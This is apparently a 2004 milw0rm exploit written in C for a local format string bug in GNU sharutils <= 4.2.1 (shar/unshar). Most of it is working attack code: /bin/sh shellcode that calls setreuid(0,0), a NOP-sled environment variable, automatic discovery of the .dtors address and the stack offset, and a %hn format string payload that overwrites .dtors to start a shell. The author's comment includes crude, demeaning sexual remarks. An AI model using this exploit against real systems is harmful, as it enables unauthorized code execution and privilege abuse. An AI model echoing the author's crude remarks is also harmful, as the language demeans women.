/* GNU sharutils <= 4.2.1 Local Format String POC Code C0ded by n4rk0tix (a.k.a nrktx) narkotix@linuxmail.org Below is a l4m3 proof of concept code for da recently reported lame bug; These binaryz have not only format bugz, but also buffer overflowz,etc.We also exploited the heap and the stack hole of theze binaryz.There are almost 3 wayz of exploiting theze elfz ,both of them r fucking boring , though, so this one is. candy@labs:/$ readelf -r `which shar` | grep uid 08050784 00000e07 R_386_JUMP_SLOT 08048d7c getpwuid 080507e0 00002807 R_386_JUMP_SLOT 08048eec getuid candy@labs:/$ exploiting non-suid binariez is like fucking 55 yearz old woman, like i did in this code :-] I'm again BACK from a long cisco trip, REGROUP TEAM, go go go... , need back up ! :] Also some greetingz signaled to: Efnet,gotcha(love from .*za :] ),dm(my netmate from madagaskar), genjuro(my lord a.k.a Uz4yh4N),L4M3R(vurun la ipnelere ehuehu,kibriti caktim, tinerci alisti ehuehe), HELl0wEeN,darkhat,mathmonkey,mtrl(68000 guru),jawz,and the otherz whom i excluded them accidently :) For More Info , read the below ascii trash. Thanx _EOF_ */ #include #include #include #include #include #include #include #include #include #include #define _GNU_SOURCE #define DEFAULT_DTORS_SHAR (0x08050738) /*Tested on Slackware 9.0*/ #define DEFAULT_DTORS_UNSHAR (0x0804ad74) /* This is not exploitable on every systemz */ #define DEFAULT_OFFSET_SHAR 22 #define DEFAULT_OFFSET_UNSHAR 262 /*lol, wtf stack layout do i have :],Probably useless..*/ #define SHAR_PATH "/usr/bin/shar" /*Default $PATH change if needed*/ #define UNSHAR_PATH "/usr/bin/unshar" #define GET_DTORS_CMD "objdump -h %s | grep .dtors | awk ' { print $4 } ' > %s" #define NOP 0x90 static int16_t WBIN = 2; int main(void) { int16_t check_bin(void); u_int32_t get_dtors(int8_t* path); int16_t get_auto_stack_offset(int8_t *binpath); void banner(void); int8_t envbuf[1000]; int8_t store_env[1010]; int8_t *shar_path = SHAR_PATH; int8_t *unshar_path = UNSHAR_PATH; static u_int8_t shellcode[] = // setreuid(0,0) "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\xb0\x46" // mov $0x46,%al "\xcd\x80" // int $0x80 // setgid(0) "\x31\xdb" // xor %ebx,%ebx "\x89\xd8" // mov %ebx,%eax "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 // execve /bin/sh "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80" // int $0x80 // exit(); "\x31\xc0" // xor %eax,%eax "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 banner(); if(!check_bin()) exit(EXIT_FAILURE); memset(envbuf,NOP,sizeof(envbuf)); strcpy((int8_t *)&envbuf[sizeof(envbuf) - strlen(shellcode)],shellcode); memcpy(store_env,"CANDY=",6); strcat(store_env,envbuf); putenv(store_env); if(!putenv) { if(errno == ENOMEM) { strerror(errno); exit(EXIT_FAILURE); } } const int8_t *USEBIN; int16_t USE_OFFSET; if(WBIN == 1){ printf("[+]Exploiting the unshar binary\n"); USEBIN = unshar_path; } if(WBIN == 2){ printf("[+]Default binary is shar\n"); USEBIN = shar_path; } if(WBIN == 3) { printf("[+]Exploiting Shar binary\n"); USEBIN = shar_path; } int8_t store[200]; u_int32_t fakebuf = 0xbffffffa - strlen(store_env) - strlen("/usr/bin/shar") + 50; u_int32_t write_dtors = get_dtors((int8_t *)USEBIN); int8_t *dtors_target[3] = { (int8_t *) write_dtors + 2, (int8_t *) write_dtors, NULL }; int16_t env_most, env_low; env_most = (fakebuf & 0xffff0000) >> 16 ; env_low = (fakebuf & 0x0000ffff); env_most -= 0x8; USE_OFFSET = get_auto_stack_offset((int8_t *)USEBIN); sprintf(store,"%s%%.%dx%%%d$hn%%.%dx%%%d$hn", &dtors_target, (u_int16_t)env_most, USE_OFFSET, (env_low - env_most) - 0x8, USE_OFFSET + 1); fprintf(stdout,"[+]Type some command,sh$ prompt may not occur\n"); fprintf(stdout,"[+]Terminal echoing is possibly off \n"); fprintf(stdout,"Type any shell command Here i.e 'id' or 'ps aux'\n"); execlp(USEBIN,USEBIN,store); fflush(stdin); fflush(stdout); return EXIT_SUCCESS; // useless, never return } int16_t check_bin(void) { int8_t *filename_shar = SHAR_PATH; int8_t *filename_unshar = UNSHAR_PATH; int16_t i = 2; if( access(filename_shar,F_OK) != 0){ fprintf(stderr,"%s Not found, Checking %s\n",filename_shar,filename_unshar); i--; WBIN = 1; } if( access(filename_unshar,F_OK) != 0) { fprintf(stderr,"%s Not found\n",filename_unshar); i--; WBIN = (WBIN == 1) ? 0 : 3; } if(!i) { fprintf(stderr,"Sorry dude, no binary available for exploiting.\n"); exit(EXIT_FAILURE); } fputs("[+]Binary checking passed\n",stdout); return(i); } u_int32_t get_dtors(int8_t* path) { FILE *readit; int *tmpfile; int8_t tmpfull[32]; char *store_dtors; int16_t status; int16_t length; ssize_t read; u_int32_t findme; int8_t *dtorsbuf = NULL; bzero((int8_t *)tmpfull,sizeof(tmpfull)); strncpy(tmpfull,"/tmp/candyXXXXXX",strlen("/tmp/candyXXXXXX")); tmpfile = (int *)mkstemp((int8_t *)tmpfull); int8_t *buffer = (int8_t *) malloc(100 * sizeof(int8_t *)); if(!malloc) { err(1,"malloc"); exit(EXIT_FAILURE); } bzero(buffer,sizeof(buffer)); snprintf(buffer,100,GET_DTORS_CMD,path,tmpfull); buffer[strlen(buffer)] = '\0'; int8_t *shar_path = SHAR_PATH; status = system(buffer); switch((status >> 8 ) & 0xff) { case 0: fprintf(stdout,"[+]Utilities check successful, no Need Defaults\n"); break; case !0: fprintf(stdout,"[+]Using default .Dtors address\n"); findme = (path == shar_path) ? DEFAULT_DTORS_SHAR : DEFAULT_DTORS_UNSHAR; goto GO_ON; default: fprintf(stdout,"[+]Using default .Dtors address\n"); fprintf(stdout,"[+]Dtors address => 0x%x\n",DEFAULT_DTORS_SHAR ); findme = (path == shar_path) ? DEFAULT_DTORS_SHAR : DEFAULT_DTORS_UNSHAR; goto GO_ON; } if ( (readit = fopen(tmpfull,"rb")) == NULL ) { strerror(errno); fprintf(stdout,"[+]Using default .Dtors address\n"); findme = (path == shar_path) ? DEFAULT_DTORS_SHAR : DEFAULT_DTORS_UNSHAR; goto GO_ON; } read = getline(&dtorsbuf,&length,readit); fflush(readit); dtorsbuf[strlen(dtorsbuf) -1 ] = '\0'; findme = strtoul(dtorsbuf,&store_dtors,16); fclose(readit); free(dtorsbuf); unlink(tmpfull); fprintf(stdout,"[+]Dtors address found => 0x%x\n",findme + 0x4); GO_ON: unlink(tmpfull); /* For System Crashes */ return(findme + 4); } int16_t get_auto_stack_offset(int8_t *binpath) { int8_t *path = "/tmp/candy"; int8_t *buffer = (int8_t *)malloc(300*sizeof(int8_t)); int8_t *shar_path = SHAR_PATH; FILE *fd; static int8_t formatbuf[100]; const u_int8_t *end_the_format = "41414141"; int8_t *format_string = "%x"; int8_t progpath[40]; bzero(progpath,sizeof(progpath)); sprintf(progpath,"%s AAAA",binpath); progpath[strlen(progpath)] = '\0'; static int16_t control = 1; static int16_t offset = 1; if ((fd = fopen(path,"wb")) == NULL) { perror("fopen"); exit(1); } if(control != 1) goto FIRSTJUMP; fflush(stderr); dup2(fileno(fd),2); bzero(formatbuf,sizeof(formatbuf)); strncpy(formatbuf,progpath,strlen(progpath)); LOOP: if ((fd = fopen(path,"wb")) == NULL) { perror("fopen"); exit(1); } fflush(stderr); dup2(fileno(fd),2); FIRSTJUMP: control++; strcat(formatbuf,format_string); system(formatbuf); fclose(fd); usleep(9999); fd = fopen(path,"rb"); if(fd == NULL){ perror("open"); fprintf(stdout,"[+]Using default Stack Offset \n"); offset = (binpath == shar_path) ? DEFAULT_OFFSET_SHAR : DEFAULT_OFFSET_UNSHAR; goto JUMP; } if(fgets(buffer,300,fd) != NULL){ if( strstr(buffer,end_the_format) == NULL) { free(buffer); fclose(fd); offset++; goto LOOP; } free(buffer); fclose(fd); unlink(path); } fprintf(stdout,"[+]Using Stack Offset %d\n",offset); JUMP: return(offset); } void banner(void) { fputs("\tGNU SharUtils <= 4.2.1 Local Format String Exploit\n" "\tnarkotix@linuxmail.org\n",stdout); } // milw0rm.com [2004-09-25]